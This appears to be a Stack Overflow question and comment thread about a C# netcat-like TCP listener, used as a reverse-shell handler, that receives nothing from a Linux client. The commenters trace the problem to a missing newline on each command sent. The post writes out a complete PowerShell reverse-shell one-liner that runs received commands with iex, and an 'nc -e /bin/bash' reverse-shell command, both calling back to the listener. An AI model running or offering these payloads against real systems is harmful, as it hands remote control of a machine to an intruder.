# Writing a Netcat similar tool in c# but can't receive data from linux

Tags: c#, linux, sockets, netcat, reverse-shell

I'm writing a tool like nc. I'm giving my ip adress and my port to listen for incoming connections. This is my source code :

```cs
using System;
using System.Collections.Generic;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace Netcat
{
    class Program
    {
        static void Main(string[] args)
        {
            var ip_Address = "XXX.XXX.XXX.XXX";
            var port = 4433;
            IPAddress ipadress = IPAddress.Parse(ip_Address);
            IPEndPoint endPoint = new IPEndPoint(ipadress, port);
        // A server socket is created and bound to the defined IP address and port
            Socket server = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            server.Bind(endPoint);
            server.Listen(10);
            Console.WriteLine("Listening");
        // The server waits for a client to connect and once a connection is established, the client socket is accepted

            Socket clientSocket = server.Accept();
            Console.WriteLine("[+]Got Connection");

        // Receive and send buffers are created
            byte[] receiveBuffer = new byte[1024];
            byte[] sendBuffer = new byte[1024];

        // A new object of type StateObject is created to hold the client socket object

            StateObject state = new StateObject();
            state.workSocket = clientSocket;


            while (true)
            {

                 // Checks if data is available to be received
                if (clientSocket.Available > 0)
                {
                    // If data is available, the ReceiveCallback method is called
                    clientSocket.BeginReceive(state.buffer, 0, StateObject.BufferSize, SocketFlags.None, new AsyncCallback(ReceiveCallback), state);
                }

            // enter a command to be sent to the client
                var command = Console.ReadLine();
            // The command is converted to bytes and sent to the client
                sendBuffer = Encoding.ASCII.GetBytes(command.ToString());
                clientSocket.Send(sendBuffer);
            }
        }

    // The ReceiveCallback method is called when data is received
        public static void ReceiveCallback(IAsyncResult ar)
        {
            StateObject state = (StateObject)ar.AsyncState;
            Socket clientSocket = state.workSocket;

        // The number of bytes received is calculated and the received data is stored in a byte array
            int numByte = clientSocket.EndReceive(ar);
            byte[] receivedBytes = new byte[numByte];
            Array.Copy(state.buffer, receivedBytes, numByte);
            string receive = Encoding.ASCII.GetString(receivedBytes);
            Console.WriteLine(receive);

                   // The received data is converted to a string and printed to the console
        // Asynchronously receive data again

            clientSocket.BeginReceive(state.buffer, 0, StateObject.BufferSize, SocketFlags.None, new AsyncCallback(ReceiveCallback), state);
        }

    // The StateObject class is used to hold the client socket object and buffer size

        public class StateObject
        {
            public Socket workSocket = null;
            public const int BufferSize = 1024;
            public byte[] buffer = new byte[BufferSize];
        }
    }
}
```

I can connect my server with powershell one line reverse shell:

```
$client = New-Object System.Net.Sockets.TCPClient('XXX.XXX.XXX.XXX',4433);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

I can connect with this powershell reverse shell. I can send commands and get response but, when I try to do same thing from my kali linux with nc reverse shell command

```
nc XXX.XXX.XXX.XXX 4433 -e /bin/bash
```

I can connect, I can send data but, I can't recevie anything from client. I mean, the ReceiveCallback asynchronous function is never triggered. So, I can't receive anything. What should I do? What am I doing wrong?

I set some breakpoints and tried to understood what is the problem but, couldn't understand. Then, I searched on google but, couldn't find anything useful.

Comment: I do not see e option in manual (https://linux.die.net/man/1/nc).  See Data Transfer paragraph.

Comment: This "data transfer" is about "file transfer". I'm not talking about this

Comment: Standard input and Standard Output are data transfers.  Probably you are not receiving any thing because you did terminate your send with a return.

Comment: hmm, sorry but can you explain a little bit more?

Comment: THANKS SO MUCH SIR, IT WORKED!!!. I just add  sendBuffer = Encoding.ASCII.GetBytes(command.ToString() + "\n" ); this. and it worked. thanks a lot sir.

Comment: hey, btw I'm new at stackoverflow. I want to mark you as answered the question. How can I do that?

Comment: pls, "Standard input and Standard Output are data transfers. Probably you are not receiving any thing because you did terminate your send with a return" add this as answer. So, I can mark you as answered correct.